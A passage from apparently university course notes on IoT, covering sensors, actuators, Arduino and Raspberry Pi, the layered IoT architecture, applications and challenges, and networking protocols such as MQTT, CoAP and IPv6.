consumption, whether they are sophisticated enough to support an operating system,
updatable firmware, and embedded device management agents. Understanding the
implications of processor choices will demand deep technical skills.

7. IoT Operating Systems. Traditional operating systems such as Windows and iOS were
not designed for IoT applications. They consume too much power, need fast processors, and
in some cases, lack features such as guaranteed real-time response. They also have too large a
memory footprint for small devices and may not support the chips that IoT developers use.
Consequently, a wide range of IoT-specific operating systems has been developed to suit
many different hardware footprints and feature needs.

8. Event Stream Processing: Some IoT applications will generate extremely high data rates
that must be analyzed in real time. Systems creating tens of thousands of events per second
are common, and millions of events per second can occur in some situations. To address such
requirements, distributed stream computing platforms have emerged that can process very
high-rate data streams and perform tasks such as real-time analytics and pattern
identification.

9. IoT Platforms. IoT platforms bundle many of the infrastructure components of an IoT
system into a single product. The services provided by such platforms fall into three main
categories:

Low-level device control and operations such as communications, device monitoring and
management, security, and firmware updates; IoT data acquisition, transformation and
management; IoT application development, including event-driven logic, application
programming, visualization, analytics and adapters to connect to enterprise systems.

10.IoT Standards and Ecosystems. Standards and their associated application programming
interfaces (APIs) will be essential because IoT devices will need to interoperate and
communicate, and many IoT business models will rely on sharing data between multiple
devices and organizations. Many IoT ecosystems will emerge, and organizations creating
products may have to develop variants to support multiple standards or ecosystems and be
prepared to update products during their life span as the standards evolve and new standards
and APIs emerge.

8.5.Sensors
Sensors are used for sensing things and devices etc. A sensor is a device that provides a
usable output in response to a specified measurement. The sensor attains a physical parameter
and converts it into a signal suitable for processing (e.g. electrical, mechanical, optical) the
characteristics of any device or material to detect the presence of a particular physical
quantity. The output of the sensor is a signal which is converted to a human-readable form
like changes in characteristics, changes in resistance, capacitance, impedance etc.

8.6.1. Characteristics of a Sensor


The static accuracy of a sensor indicates how much the sensor signal correctly represents the
measured quantity after it stabilizes (i.e. beyond the transient period.) Important static
characteristics of sensors include sensitivity, resolution, linearity, zero drift and full-scale
drift, range, repeatability and reproducibility.

1. Sensitivity is a measure of the change in output of the sensor relative to a unit change
in the input (the measured quantity.) Example: The speakers you purchase for your
home entertainment may have a rated sensitivity of 89 dB Signal Pressure Level per
Watt per meter.

2. Resolution is the smallest amount of change in the input that can be detected and
accurately indicated by the sensor. Example: What is the resolution of an ordinary
ruler? of a Vernier Calipers?

3. Linearity is determined by the calibration curve. The static calibration curve plots the
output amplitude versus the input amplitude under static conditions. Its degree of
resemblance to a straight line describes the linearity.

4. Drift is the deviation from a specific reading of the sensor when the sensor is kept at
that value for a prolonged period of time. The zero drift refers to the change in sensor
output if the input is kept steady at a level that (initially) yields a zero reading.
Similarly, the full -scale drift is the drift if the input is maintained at a value which
originally yields a full scale deflection. Reasons for drift may be extraneous, such as
changes in ambient pressure, humidity, temperature etc., or due to changes in the
constituents of the sensor itself, such as aging, wear etc.

5. The range of a sensor is determined by the allowed lower and upper limits of its input
or output. Usually the range is determined by the accuracy required. Example:

Sometimes the range may just be determined by physical limitations. Example: a pocket
ruler.

6. Repeatability is defined as the deviation between measurements in a sequence when


the object under test is the same and approaches its value from the same direction
each time. The measurements have to be made under a short enough time duration so
as not to allow significant long term drift. Repeatability is usually specified as a
percentage of the sensor range. Example:
7. Reproducibility is the same as repeatability, except it also incorporates long time
lapses between subsequent measurements. The sensor has to be operation between
measurements, but must be calibrated. Reproducibility is specified as a percentage of
the sensor range per unit of time.

The dynamic characteristics of a sensor represent the time response of the sensor system.
Knowledge of these is essential to fruitfully use a sensor. Important common dynamic
responses of sensors include rise time, delay time, peak time, settling time percentage error
and steady-state error

8.6.2. Classification of Sensors


The common IoT sensors include:

Temperature sensors, Pressure sensors, Motion sensors, Level sensors, Image sensors,
Proximity sensors, Water quality sensors, Chemical sensors, Gas sensors, Smoke sensors,
Infrared (IR) sensors, Humidity sensors, etc.
A description of each of these sensors is provided below.

Temperature sensors

Temperature sensors detect the temperature of the air or a physical object and concert that
temperature level into an electrical signal that can be calibrated accurately reflect the
measured temperature. These sensors could monitor the temperature of the soil to help with
agricultural output or the temperature of a bearing operating in a critical piece of equipment
to sense when it might be overheating or nearing the point of failure.

Pressure sensors

Pressure sensors measure the pressure or force per unit area applied to the sensor and can
detect things such as atmospheric pressure, the pressure of a stored gas or liquid in a sealed
system such as tank or pressure vessel, or the weight of an object.

Motion sensors

Motion sensors or detectors can sense the movement of a physical object by using any one of
several technologies, including passive infrared (PIR), microwave detection, or ultrasonic,
which uses sound to detect objects. These sensors can be used in security and intrusion
detection systems, but can also be used to automate the control of doors, sinks, air
conditioning and heating, or other systems.

Level sensors

Level sensors translate the level of a liquid relative to a benchmark normal value into a
signal. Fuel gauges display the level of fuel in a vehicle’s tank, as an example, which
provides a continuous level reading. There are also point level sensors, which are a go-no/go
or digital representation of the level of the liquid. Some automobiles have a light that
illuminates when the fuel level tank is very close to empty, acting as an alarm that warns the
driver that fuel is about to run out completely.

Image sensors

Image sensors function to capture images to be digitally stored for processing. License plate
readers are an example, as well as facial recognition systems. Automated production lines can
use image sensors to detect issues with quality such as how well a surface is painted after
leaving the spray booth.

Proximity sensors

Proximity sensors can detect the presence or absence of objects that approach the sensor
through a variety of different technology designs.

Water quality sensors

The importance of water to human beings on earth not only for drinking but as a key
ingredient needed in many production processes dictates the need to be able to sense and
measure parameters around water quality. Some examples of what is sensed and monitored
include:

Chemical presence (such as chlorine levels or fluoride levels),Oxygen levels (which may
impact the growth of algae and bacteria),Electrical conductivity (which can indicate the level
of ions present in water), pH level (a reflection of the relative acidity or alkalinity of the
water),Turbidity levels (a measurement of the amount of suspended solids in water)

Chemical sensors

Chemical sensors are designed to detect the presence of specific chemical substances which
may have inadvertently leaked from their containers into spaces that are occupied by
personnel and are useful in controlling industrial process conditions.

Gas sensors

Related to chemical sensors, gas sensors are tuned to detect the presence of combustible,
toxic, or flammable gas in the vicinity of the sensor. Examples of specific gases that can be
detected include:

Bromine (Br2), Carbon Monoxide (CO), Chlorine (Cl2), Chlorine Dioxide (ClO2),Hydrogen
Cyanide (HCN),Hydrogen Peroxide (H2O2), Hydrogen Sulfide (H2S), Nitric Oxide (NO),
Nitrogen Dioxide (NO2), Ozone (O3), etc.
Smoke sensors

Smoke sensors or detectors pick up the presence of smoke conditions which could be an
indication of a fire typically using optical sensors (photoelectric detection) or ionization
detection.

Infrared (IR) sensors


Infrared sensor technologies detect infrared radiation that is emitted by objects. Non-contact
thermometers make use of these types of sensors as a way of measuring the temperature of an
object without having to directly place a probe or sensor on that object. They find use in
analyzing the heat signature of electronics and detecting blood flow or blood pressure in
patients.

Acceleration sensors

While motion sensors detect movement of an object, acceleration sensors, or accelerometers


as they are also known, detect the rate of change of velocity of an object. This change may be
due to a free-fall condition, a sudden vibration that is causing movement with speed changes,
or rotational motion (a directional change).

8.7. Actuators

An actuator is a machine component or system that moves or controls the


mechanism or the system. Sensors in the device sense the environment, then
control signals are generated for the actuators according to the actions needed to
perform. Actuators convert an electrical signal into a corresponding physical
quantity such as movement, force, sound etc.

8.7.1. Types of Actuators


1. Servo Motors:

Servo is a small device that incorporates a two wire DC motor, a gear train, a potentiometer,
an integrated circuit, and a shaft (output spine).

2. Stepper Motors:

Stepper motors are DC motors that move in discrete steps. They have multiple coils that
are organized in groups called “phases”. By energizing each phase in sequence, the motor
will rotate, one step at a time. With a computer controlled stepping, you can achieve very
precise positioning and/or speed control.

3. DC Motors (Continuous Rotation Motors):

Direct Current (DC) motor is the most common actuator used in projects. They are simple,
cheap, and easy to use. DC motors convert electrical into mechanical energy. Also, they come
in different sizes.

4. Linear actuator:

A linear actuator is an actuator that creates motion in a straight line, in contrast to the circular
motion of a conventional electric motor. Linear actuators are used in machine tools and
industrial machinery, in computer peripherals such as disk drives and printers, in valves and
dampers, and in many other places where linear motion is required

5. Relay:

A relay is an electrically operated switch. Many relays use an electromagnet to mechanically


operate a switch. The advantage of relays is that it takes a relatively small amount of power to
operate the relay coil, but the relay itself can be used to control motors, heaters, lamps or AC
circuits which themselves can draw a lot more electrical power

6. Solenoid:
A solenoid is simply a specially designed electromagnet. Solenoids are inexpensive, and their
use is primarily limited to on-off applications such as latching, locking, and triggering. They
are frequently used in home appliances (e.g. washing machine valves), office equipment (e.g.
copy machines), automobiles (e.g. door latches and the starter solenoid), pinball machines
(e.g., plungers and bumpers), and factory automation

8.8.Computing Components (Arduino, Raspberry Pi)


 Arduino Board: An Arduino is actually a microcontroller based kit.
 It is basically used in communications and in controlling or operating many devices.
 Arduino UNO board is the most popular board in the Arduino board family.
 In addition, it is the best board to get started with electronics and coding.
 Some boards look a bit different from the one given below, but most Arduino’s have
majority of these components in common.
 It consists of two memories- Program memory and the data memory.
 The code is stored in the flash program memory, whereas the data is stored in the data
memory.
 Arduino Uno consists of 14 digital input/output pins (of which 6 can be used as PWM
outputs), 6 analog inputs, a 16 MHz crystal oscillator, a USB connection, a power
jack, an ICSP header, and a reset button 1.Power USB 2.Power (Barrel Jack)
3.Voltage Regulator 4.Crystal Oscillator 17.Arduino Reset 5.Arduino Reset
6,7,8,9.Pins (3.3, 5, GND, Vin) 10.Analog pins 11.Main microcontroller 12.ICSP pin
13.Power LED indicator 14.TX and RX LEDs 15.D

Raspberry Pi
 The Raspberry Pi is a very cheap computer that runs Linux, but it also provides a set
of GPIO (general purpose input/output) pins that allow you to control electronic
components for physical computing and explore the Internet of Things (IoT).
 Raspberry Pi was basically introduced in 2006.
 It is particularly designed for educational use and intended for Python.
 A Raspberry Pi is of small size i.e., of a credit card sized single board computer,
which is developed in the United Kingdom(U.K) by a foundation called Raspberry Pi

There have been three generations of Raspberry Pis: Pi 1, Pi 2, and Pi 3


 The first generation of Raspberry (Pi 1) was released in the year 2012, that has two
types of models namely model A and model B.
 Raspberry Pi can be plugged into a TV, computer monitor, and it uses a standard
keyboard and mouse.
 It is user friendly as can be handled by all the age groups.
 It does everything you would expect a desktop computer to do like word-processing,
browsing the internet spread sheets, playing games to playing high definition videos.
 All models feature on a broadcom system on a chip (SOC), which includes chip
graphics processing unit GPU(a Video Core IV), an ARM compatible and CPU.
 The CPU speed ranges from 700 MHz to 1.2 GHz for the Pi 3 and on board memory
range from 256 MB to 1 GB RAM.
 An operating system is stored in the secured digital SD cards and program memory in
either the MicroSDHC or SDHC sizes.
 Most boards have one to four USB slots, composite video output, HDMI and a 3.5
mm phone jack for audio. Some models have WiFi and Bluetooth.

 All models feature a Broadcom system on a chip (SoC) with an integrated ARM-
compatible central processing unit (CPU) and on-chip graphics processing unit
(GPU).
 Processor speed ranges from 700 MHz to 1.4 GHz for the Pi 3 Model B+ or 1.5 GHz
for the Pi 4; on-board memory ranges from 256 MB to 1 GB with up to 4 GB
available on the Pi 4 random-access memory (RAM).
 Secure Digital (SD) cards in Micro SDHC form factor (SDHC on early models) are
used to store the operating system and program memory.
 The boards have one to five USB ports. For video output, HDMI and composite video
are supported, with a standard 3.5 mm tip-ring-sleeve jack for audio output.
 Lower-level output is provided by a number of GPIO pins, which support common
protocols like I²C. The B-models have an 8P8C Ethernet port and the Pi 3 and Pi Zero
W have on-board Wi-Fi and Bluetooth.
8.9.IoT Architecture
The Reference Model introduced in 2014 by Cisco, IBM, and Intel at the 2014 IoT World
Forum has as many as seven layers. According to an official press release by Cisco forum
host, the architecture aims to “help educate CIOs, IT departments, and developers on
deployment of IoT projects, and accelerate the adoption of IoT.”
These layers are:
1. The perception layer hosting smart things;
2. The connectivity or transport layer transferring data from the physical layer to the
cloud and vice versa via networks and gateways;
3. The processing layer employing IoT platforms to accumulate and manage all data
streams; and
4.The application layer delivering solutions like analytics, reporting, and device control
to end users.
Perception layer: converting analog signals into digital data and vice versa
The initial stage of any IoT system embraces a wide range of “things” or endpoint devices
that act as a bridge between the real and digital worlds. They vary in form and size, from tiny
silicon chips to large vehicles. By their functions, IoT things can be divided into the
following large groups.
Sensors such as probes, gauges, meters, and others. They collect physical parameters like
temperature or humidity, turn them into electrical signals, and send them to the IoT system.
IoT sensors are typically small and consume little power.
Actuators, translating electrical signals from the IoT system into physical actions.
Machines and devices connected to sensors and actuators or having them as integral parts.
Connectivity layer: enabling data transmission
The second level is in charge of all communications across devices, networks, and cloud
services that make up the IoT infrastructure. The connectivity between the physical layer and
the cloud is achieved in two ways:
directly, using TCP or UDP/IP stack;
via gateways — hardware or software modules performing translation between different
protocols as well as encryption and decryption of IoT data.
The communications between devices and cloud services or gateways involve different
networking technologies.
Ethernet connects stationary or fixed IoT devices like security and video cameras,
permanently installed industrial equipment, and gaming consoles.
WiFi, the most popular technology of wireless networking, is a great fit for data-intensive
IoT solutions that are easy to recharge and operate within a small area. A good example of
use is smart home devices connected to the electrical grid.
NFC (Near Field Communication) enables simple and safe data sharing between two
devices over a distance of 4 inches (10 cm) or less.
Bluetooth is widely used by wearables for short-range communications. To meet the needs of
low-power IoT devices, the Bluetooth Low-Energy (BLE) standard was designed. It transfers
only small portions of data and doesn’t work for large files.
LPWAN (Low-power Wide-area Network) was created specifically for IoT devices. It
provides long-range wireless connectivity on low power consumption with a battery life of
10+ years. Sending data periodically in small portions, the technology meets the requirements
of smart cities, smart buildings, and smart agriculture (field monitoring).
ZigBee is a low-power wireless network for carrying small data packages over short
distances. The outstanding thing about ZigBee is that it can handle up to 65,000 nodes.
Created specifically for home automation, it also works for low-power devices in industrial,
scientific, and medical sites.
Cellular networks offer reliable data transfer and nearly global coverage. There are two
cellular standards developed specifically for IoT things. LTE-M (Long Term Evolution for
Machines) enables devices to communicate directly with the cloud and exchange high
volumes of data. NB-IoT or Narrowband IoT uses low-frequency channels to send small data
packages.
Edge or fog computing layer: reducing system latency
This level is essential for enabling IoT systems to meet the speed, security, and scale
requirements of the 5th generation mobile network or 5G. The new wireless standard
promises faster speeds, lower latency, and the ability to handle many more connected
devices, than the current 4G standard.
The idea behind edge or fog computing is to process and store information as early and as
close to its sources as possible. This approach allows for analyzing and transforming high
volumes of real-time data locally, at the edge of the networks. Thus, you save the time and
other resources that otherwise would be needed to send all data to cloud services. The result
is reduced system latency that leads to real-time responses and enhanced performance.
Processing layer: making raw data useful
The processing layer accumulates, stores, and processes data that comes from the previous
layer. All these tasks are commonly handled via IoT platforms and include two major stages.
Data accumulation stage
The real-time data is captured via an API and put at rest to meet the requirements of non-real-
time applications. The data accumulation component stage works as a transit hub between
event-based data generation and query-based data consumption.
Among other things, the stage defines whether data is relevant to the business requirements
and where it should be placed. It saves data to a wide range of storage solutions, from data
lakes capable of holding unstructured data like images and video streams to event stores and
telemetry databases. The total goal is to sort out a large amount of diverse data and store it in
the most efficient way.
Data abstraction stage
Here, data preparation is finalized so that consumer applications can use it to generate
insights. The entire process involves the following steps:
combining data from different sources, both IoT and non-IoT, including ERM, ERP, and
CRM systems; reconciling multiple data formats; and aggregating data in one place or
making it accessible regardless of location through data virtualization.
Similarly, data collected at the application layer is reformatted here for sending to the
physical level so that devices can “understand” it.
Together, the data accumulation and abstraction stages veil details of the hardware,
enhancing the interoperability of smart devices. What’s more, they let software developers
focus on solving particular business tasks — rather than on delving into the specifications of
devices from different vendors.
Application layer: addressing business requirements
At this layer, information is analyzed by software to give answers to key business questions.
There are hundreds of IoT applications that vary in complexity and function, using different
technology stacks and operating systems. Some examples are:
device monitoring and control software, mobile apps for simple interactions, business
intelligence services, and analytic solutions using machine learning.
Currently, applications can be built right on top of IoT platforms that offer software
development infrastructure with ready-to-use instruments for data mining, advanced
analytics, and data visualization. Otherwise, IoT applications use APIs to integrate with
middleware.

Business layer: Implementing data-driven solutions


The information generated at the previous layers brings value if only it results in problem-
solving solution and achieving business goals. New data must initiate collaboration between
stakeholders who in turn introduce new processes to enhance productivity.
The decision-making usually involves more than one person working with more than one
software solution. For this reason, the business layer is defined as a separate stage, higher
than a single application layer.
Security layer: preventing data breaches
It goes without saying that there should be a security layer covering all the above-mentioned
layers. IoT security is a broad topic worthy of a separate article. Here we’ll only point out the
basic features of the safe architecture across different levels.
Device security. Modern manufacturers of IoT devices typically integrate security features
both in the hardware and firmware installed on it. This includes embedded TPM (Trusted
Platform Module) chips with cryptographic keys for authentication and protection of
endpoint devices;
a secure boot process that prevents unauthorized code from running on a powered-up device;
updating security patches on a regular basis; and physical protection like metal shields to
block physical access to the device.
Connection security. Whether data is being sent over devices, networks, or applications, it
should be encrypted. Otherwise, sensitive information can be read by anybody who intercepts
information in transit. IoT-centric messaging protocols like MQTT, AMQP, and DDS may
use standard Transport Layer Security (TSL) cryptographic protocol to ensure end-to-end
data protection.
Cloud security. Data at rest stored in the cloud must be encrypted as well to mitigate risks of
exposing sensitive information to intruders. Cloud security also involves authentication and
authorization mechanisms to limit access to the IoT applications. Another important security
method is device identity management to verify the device’s credibility before allowing it to
connect to the cloud.
The good news is that IoT solutions from large providers like Microsoft, AWS, or Cisco
come with pre-built protection measures including end-to-end data encryption, device
authentication, and access control. However, it always pays to ensure that security is tight at
all levels, from the tiniest devices to complex analytical systems.

Applications of IoT
1. IoT Wearables

Wearable technology is a hallmark of IoT applications and probably is one of the earliest
industries to have deployed the IoT at its service. We happen to see Fit Bits, heart rate
monitors and smart watches everywhere these days.
One of the lesser-known wearables includes the Guardian glucose monitoring device. The
device is developed to aid people suffering from diabetes. It detects glucose levels in the
body, using a tiny electrode called glucose sensor placed under the skin and relays the
information via Radio Frequency to a monitoring device.
2. IoT Applications – Smart Home Applications

When we talk about IoT Applications, Smart Homes are probably the first thing that we think
of. The best example I can think of here is Jarvis, the AI home automation employed by
Mark Zuckerberg. There is also Allen Pan’s Home Automation System where functions in
the house are actuated by use of a string of musical notes

3. IoT Applications – Health Care


IoT applications can turn reactive medical-based systems into proactive wellness-based
systems.

The resources that current medical research uses, lack critical real-world information. It
mostly uses leftover data, controlled environments, and volunteers for medical
examination. IoT opens ways to a sea of valuable data through analysis, real-time field data,
and testing.
The Internet of Things also improves the current devices in power, precision, and
availability. IoT focuses on creating systems rather than just equipment

4. IoT Applications – Smart Cities


By now I assume, most of you must have heard about the term Smart City. The hypothesis
of the optimized traffic system I mentioned earlier, is one of the many aspects that constitute
a smart city.
The thing about the smart city concept is that it’s very specific to a city. The problems faced
in Mumbai are very different than those in Delhi. The problems in Hong Kong are different
from New York. Even global issues, like finite clean drinking water, deteriorating air quality
and increasing urban density, occur in different intensities across cities. Hence, they affect
each city differently.
5. IoT Applications – Agriculture
Statistics estimate the ever-growing world population to reach nearly 10 billion by the year
2050. To feed such a massive population one needs to marry agriculture to technology and
obtain best results. There are numerous possibilities in this field. One of them is the Smart
Greenhouse.
A greenhouse farming technique enhances the yield of crops by controlling environmental
parameters. However, manual handling results in production loss, energy loss, and labor cost,
making the process less effective.
6. IoT Applications – Industrial Automation
This is one of the fields where both faster developments, as well as the quality of products,
are the critical factors for a higher Return on Investment. With IoT Applications, one could
even re-engineer products and their packaging to deliver better performance in both cost and
customer experience. IoT here can prove to be game changing with solutions for all the
following domains in its arsenal.
Factory Digitalization
Product flow Monitoring
Inventory Management
Safety and Security
Quality Control
Packaging optimization
Logistics and Supply Chain Optimization

8.10. Challenges of IoT


The biggest challenges for IoT adoption include:

 Security Challenges
 Regulation Challenges
 Compatibility Challenges
 Bandwidth Challenges
 Customer Expectation Challenges

Security Challenges:

Rapid advances in both technology and the complexity of cyber-attacks have meant that the
risk of security breaches has never been higher. There is an increased responsibility
for software developers to create the most secure applications possible to defend against this
threat as IoT devices are often seen as easy targets by hackers.

Regulation Challenges

We’ve already touched on how GDPR has impacted the IoT industry, however, as the
industry is still relatively new and young, it generally lacks specific regulation and oversight,
which is required to ensure that all devices are produced with a suitable level of protection
and security.

Compatibility Challenges

At the core of the IoT concept, all devices must be able to connect and communicate with
each other for data to be transferred.
The IoT industry currently lacks any compatibility standards, meaning that many devices
could all run on different standards resulting in difficulties communicating with one another
effectively.

Bandwidth Challenges

Perhaps at no surprise, devices and applications that rely on the ability to communicate with
each other constantly to work effectively tend to use a lot of data at once, leading to
bandwidth constraints for those using many devices at once.

Combine this with existing demands for data and broadband in the typical house, and you can
quickly see how data and bandwidth limitations can be a challenge.

Customer Expectation Challenges

Arguably the biggest hurdle for the industry relates to customer perception. For anything new
to be adopted by the masses, it has to be trusted completely.

For the IoT industry, this is a continuously evolving challenge as it relies on the ability to
actively combat security threats and reassure the general consumer market that the devices
are both safe to use and secure to hold vast quantities of sensitive data
UNIT 9 IoT NETWORKING AND CONNECTIVITY
TECHNOLOGIES

9.1Introduction
9.2Objectives
9.3M2M and IoT Technology
9.4Components of IoT Implementation
9.5Gateway Prefix Allotment
9.6Impact of Mobility on Addressing
9.7Multihoming
9.8IoT Identification and Data Protocols
 IPv4, IPv6, MQTT, CoAP, XMPP, AMQP
9.9 Connectivity Technologies
 IEEE 802.15.4, ZigBee, 6LoWPAN, RFID, NFC, Bluetooth, Z-wave
9.10Summary

9.1 INTRODUCTION

Machine-to-Machine or M2M is a technology that allows connectivity between network devices.


It allows tapping of sensor data and transmitting it over a public network. IoT technology, on the
other hand, expands the concept of M2M by creating large networks of devices in which devices
communicate with one another through cloud networking platforms. It allows users to create
high performance, fast and flexible networks that can connect a variety of devices.

9.2 OBJECTIVES
After going through this unit, you should be able to:

 Know about the M2M and IoT technology


 Know about the components required for IoT implementation
 Know about gateway prefix allotment & impact of mobility
 Know about various identification and data protocols
 Know about various connectivity technologies

1
9.3 M2M AND IoT TECHNOLOGY

Machine-to-Machine or M2M is a technology that allows connectivity between network devices.


This point to point connectivity is established to transfer information over public networks like
ethernet or cellular networks without human intervention. Its main purpose is to tap sensor data
and transmit it over a public network. The use of public networks makes it cost efficient. It has
many applications in the sectors like health care, insurance, business etc.

Various components that make up an M2M system are - sensors, RFID (Radio Frequency
Identification) , Wi-Fi or cellular network, and a computing software which helps networking
devices to interpret data and decision making. These M2M applications can translate data which
in turn can trigger automated actions.Various benefits offered by M2M are -

1. It reduces cost by making use of public network and minimizing downtime


2. Increase revenue by identifying new business opportunities
3. Increase customer satisfaction by timely servicing equipment and regularly monitoring.

M2M Applications

Sensor telemetry is one of the first application of M2M communication. It has been used since
the last century for transmitting operational data. Earlier people used telephone lines, then radio
waves, to transmit measurements factors like- temperature, pressure etc for remote monitoring.
Another example of M2M communication is ATM. ATM machine routes information regarding
request for transaction to appropriate bank. The bank in turn through its system approves it and
allows transactions to complete. It also has applications in supply chain management (SCM),
warehouse management systems (WMS), Utility companies, etc. Fig 1 shows various
applications of M2M.

2
Fig 1. Applications of M2M

Internet of Things (IoT)

Internet of Things or IoT, is a technology that has evolved from M2M by increasing the
capabilities at both consumers and enterprise level. It expands the concept of M2M by creating
large networks of devices in which devices communicate with one another through cloud
networking platforms. It allows users to create high performance, fast and flexible networks that
can connect a variety of devices. Table 1 summarizes the differences between M2M and IoT
devices.

IoT is a network of physical objects , called “Things” , embedded with hardware like - sensors or
actuators or software, for exchanging data with other devices over the internet. With the help of
this technology, it is possible to connect any kind of device like simple household objects
example- kitchen appliances, baby monitors, ACs, TVs, etc to other objects like- cars, traffic
lights, web camera, etc. Connecting these objects to the internet through embedded devices,
allows seamless communication between things, processes or people. Some of the applications of
IoT devices are – smart home voice assistant Alexa, smart traffic light system.

IoT devices when connected to cloud platforms, can provide a huge and wide variety of
industrial or business applications. As the number of IoT devices are increasing, the problem of
storing, accessing and processing is also emerging. IoT when used with Cloud technology
provides solutions to these problems due to huge infrastructure provided by cloud providers.

3
Table 1. Difference between M2M and IoT devices

M2M – Machine 2 Machine IoT – Internet of Things

Point to point connection establishment Devices are connected through the network
and also supports connecting to global cloud
networks.

Limited amount of intelligence Decision making is enabled

Makes use of internet protocols like- HTTP, Makes use of traditional communication
FTP, etc. protocols

Generally may not rely on internet connection Generally Rely on internet connection

Less scalable Highly scalable

9.4COMPONENTS OF IoT IMPLEMENTATION

IoT systems can be implemented by four components.

1. Sensors
Sensors are devices that are capable of collecting data from the environment. There are
various types of sensors available –temperature sensors, pressure sensors, RFID tags,
light intensity detectors, electromagnetic sensors, etc.

2. Network
Data collected from sensors are passed over the network for computations to the cloud or
processing nodes. Depending upon the scale, they may be connected over LAN, MAN or
WAN. They can also be connected through wireless networks like- Bluetooth, ZigBee,
Wi-Fi, etc.

3. Analytics
The process of generating useful insights from the data collected by sensors is called
analytics. Analytics when performed in real time, can have numerous applications and
can make the IoT system efficient.

4. Action

4
Information obtained after analytics must be either passed to the user using some user
interface, messages, alerts, etc; or may also trigger some actions with the help of
actuators. Actuators are the devices that perform some action depending on the command
given to them over the network.

Fig 2 shows implementation of IoT. Data captured by sensors are passed on to the cloud servers
over the internet via gateways. Cloud servers in turn perform analytics and pass on the decisions
or commands to actuators.

Fig 2:IoT implementation


(Source: Reference 1)

Check your Progress 1

1. What is IoT technology?


2. State differences between M2M and IoT technology.
3. What are the various components involved in implementation of IoT?

9.5 GATEWAY PREFIX ALLOTMENT

5
Gateways are networking devices that connect IoT devices like sensors or controllers to Cloud.
In other ways we can say that data generated by IoT devices are transferred to Cloud servers
through IoT gateways.

The number of IoT devices is increasing at an exponential rate. These IoT devices are connected
in a LAN or a WAN. A number of IoT devices within a building, communicating to a gateway
installed in the same building over a wi-fi connection can be called an IoT LAN. Geographically
distributed LAN segments are interconnected and connected to the internet via gateways to form
IoT WAN. Devices connected within LAN have unique IP addresses but may have addresses the
same as devices of another LAN .

Gateways connect IoT LANs and WANs together. It is responsible for forwarding packets
between them on the IP layer. Since a large number of devices are connected, address space
needs to be conserved. Each connected device needs a unique address. IP addresses allocated to
devices within a gateway's jurisdiction are valid only in its domain. Same addresses may be
allocated in another gateway’s domain. Hence to maintain uniqueness, each gateway is assigned
a unique network prefix. It is used for global identification of gateways. This unique identifier
removes the need of allocating a unique IP address to each and every device connected to the
network, hence saves a lot of address space.

Gateway prefix allotment is shown in fig 3. Here two gateway domains are shown. Both of them
are connected to the internet via router. This router has its own address space and allows
connectivity to the internet. This router assigns a unique gateway prefix to both the gateways.
Hence packets are forwarded from gateways to the internet via routers.

6
Fig 3: Gateway prefix allotment
(Source: Reference 1)

9.6 IMPACT OF MOBILITY ON ADDRESSING

When an IoT device moves from one location to another in a network, its address is affected.
Network prefix allocated to gateways change due to mobility. WAN addresses allocated to
devices through gateways changes without affecting IoT LAN addresses. This is possible
because addresses allocated within a domain of gateway are unique. It is not affected by mobility
of devices. These unique local addresses (ULA) are maintained independent of global addresses.
For giving internet access to these ULAs, they are connected to application layer proxy which
routes them globally.

Gateways are attached to a remote anchor point by using protocols like IPv6. These remote
anchor points are immune to changes of network prefix. It is also possible for the nodes in a
network to establish direct connection with remote anchor points to access the internet directly
using tunneling. Fig 4 shows remote anchor points having access to gateways.

7
Fig 4: Remote anchor point
(Source: Reference 1)

9.7 MULTIHOMING

The practice of connecting a host to more than one network is called Multihoming. This can
increase reliability and performance. Various ways to performmultihoming are –

1. Host multihoming
In this type of multihoming, a single host can be connected to two or more networks. For
example a computer connected to both a local network and awi-fi network.

2. Classical multihoming
In this type of multihoming, a single network is connected to multiple providers. Edge
router communicates with providers using dynamic routing protocols. This protocol can
recognize failures and reconfigure routing tables without hosts being aware of it. It
requires address space recognized by all providers, hence it is costly.

8
9.8 IoT IDENTIFICATION AND DATA PROTOCOLS
IoT devices are diverse in their architecture and its use cases can scale from single device
deployment to massive cross-platform deployment. There are various types of communication
protocols that allow communication between these devices. Some of the protocols are given
below.

IPv4

Internet Protocol is a network layer protocol version 4 used to provide addresses to hosts in a
network. It is a widely used communication protocol for different kinds of networks. It is a
connectionless protocol that makes use of packet switching technology. It is used to give a 32 bit
address to a host. It is divided into five classes – A, B, C, D, and E. It can provide upto 4.3
billion addresses only which is not sufficient for an IoT device. It allows data to be encrypted but
does not limit access to data hosted on the network.

IPV6

As the total number of addresses provided by IPv4 are not sufficient specially for IoT devices,
Internet protocol version 6 or IPv6 is introduced. It is an upgraded version of IPv4. It uses 128
bits to address a host hence anticipates future growth and provides relief from shortage of
network addresses. It gives better performance than IPv4. It also ensures privacy and data
integrity. It is automatically configured and has built-in support for authentication. Some of the
differences between IPv4 and IPv6 are shown in table 2.

Table 2. Differences between IPv4 and IPv6

IPv4 IPv6

Its length is 32 bits Its length is 128 bits

Possible number of addresses are 232 Possible number of addresses are 2128

It is represented in dotted decimal notation It is represented in hexadecimal notation

IPsec is optional IPsec is compulsory

It supports manual or DHCP configuration It supports auto-configuration

9
It supports broadcasting It supports multicasting

MQTT

Message queuing telemetry transport (MQTT) is a widely used light-weight messaging protocol
based on subscription. It is used in conjunction with TCP/IP protocol. It is designed for battery
powered devices. Its model is based on Subscriber, Publisher and Broker. Publishers are light
weight sensors and subscribers are applications which will receive data from publishers.
Subscribers need to subscribe to a topic. Messages updated in a topic are distributed by brokers.
Publisher collects the data and sends it to the subscriber through a broker. Broker after receiving
messages, filtering and making decisions, sends messages to the subscribers. Brokers also ensure
security by authorizing subscribers and publishers. Fig 5 shows the working of MQTT.

Fig 5: Working of MQTT

CoAP

Constrained Application Protocol (CoAP) is a web transfer protocol used to translate the HTTP
model so as to be used with restrictive devices and network environments.It is used for low
powered devices. It allows low power sensors to interact with RESTful services. It makes use of
UDP for establishing communication between endpoints. It allows data to be transmitted to
multiple hosts using low bandwidth.

XMPP

10
Extensible messaging and presence protocol (XMPP) enables real time exchange of extensible
data between network entities. It is a communication protocol based on XML i.e. extensible
markup language. It is an open standard hence anyone can implement these services. It also
supports M2M communication across a variety of networks. It can be used for instant
messaging, multi-party chat, video calls, etc.

AMQP

Advanced message queuing protocol i.e AMQP is an application layer message oriented
protocol. It is open standard, efficient, multi-channel, portable and secure. This is fast and also
guarantees delivery along with acknowledgement of received messages. It can be used for both
point-to-point and publish-subscribe messaging. It is used for messaging in client-server
environments. It also supports a multi-client environment and helps servers to handle requests
faster.

Need to elaborate more on Protocols?

9.8 CONNECTIVITY TECHNOLOGIES

IoT devices need to be connected in order to work. Various technologies used to establish
connections between devices are discussed in this section.

IEEE 802.15.4

